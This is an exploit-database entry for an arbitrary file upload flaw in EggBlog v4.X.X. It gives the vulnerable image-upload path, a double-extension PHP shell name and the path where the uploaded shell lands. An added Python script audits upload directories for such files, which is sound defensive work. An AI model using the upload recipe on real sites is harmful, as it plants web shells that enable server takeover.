EggBlog v4.X.X Arbitrary File Upload vulnerability

2013-12-14T00:00:00
ID 1337DAY-ID-21665
Type zdt
Reporter TUNISIAN CYBER
Modified 2013-12-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
[+] Author: TUNISIAN CYBER
[+] Exploit Title:  EggBlog v4.X.X Arbitrary File Upload vulnerability
[+] Date: 13-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/eggblog/
[+] Google Dork: Do Some Work and you'll find it :)
[+] Tested on: Win7, Ubuntu 13.04
  
  
########################################################################################

Site.ltd/[PaTh]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
Upload h4x3d.php.jpg/gif/png
Shell Path:
site.ltd/[PaTh]/photos/uploads/h4x3d.php.jpg

Demo:
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt
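
A defender-side check for the pattern above, as an added example that is not part of the original advisory: it audits an uploads directory such as photos/uploads for names like h4x3d.php.jpg and for files whose bytes do not match their image extension. The script-extension list, the finding labels and the sample files are assumptions constructed for illustration.

```python
import tempfile
from pathlib import Path

# Assumed list of extensions a PHP handler may execute; match it to your server config.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Leading bytes expected for each allowlisted image extension.
JPEG = (b"\xff\xd8\xff",)
IMAGE_MAGIC = {"jpg": JPEG, "jpeg": JPEG, "gif": (b"GIF87a", b"GIF89a"),
               "png": (b"\x89PNG\r\n\x1a\n",)}

def audit_upload(name, data):
    """Return the findings for one stored file; an empty list means clean."""
    findings = []
    parts = name.lower().split(".")
    final_ext = parts[-1] if len(parts) > 1 else ""
    # Check every extension, not only the last one: "x.php.jpg" must be caught.
    if any(p in SCRIPT_EXTS for p in parts[1:]):
        findings.append("script-extension-in-name")
    magics = IMAGE_MAGIC.get(final_ext)
    if magics is None:
        findings.append("extension-not-allowlisted")
    elif not data.startswith(magics):
        findings.append("content-does-not-match-extension")
    # A valid image header does not rule out embedded PHP, so test separately.
    if b"<?php" in data.lower():
        findings.append("php-open-tag-in-content")
    return findings

def audit_directory(root):
    """Walk an uploads directory; return {relative_path: findings} for flagged files."""
    flagged = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            found = audit_upload(path.name, path.read_bytes())
            if found:
                flagged[str(path.relative_to(root))] = found
    return flagged

def demo():
    """Audit two constructed sample files in a temporary directory."""
    samples = {"holiday.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
               "h4x3d.php.jpg": b"GIF89a<?php echo 1; ?>"}
    with tempfile.TemporaryDirectory() as root:
        for name, data in samples.items():
            Path(root, name).write_bytes(data)
        return audit_directory(root)

if __name__ == "__main__":
    print(demo())
```

The same `audit_upload` logic can be applied at upload time to reject a file before it is written under the web root.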

#  0day.today [2018-03-01]  #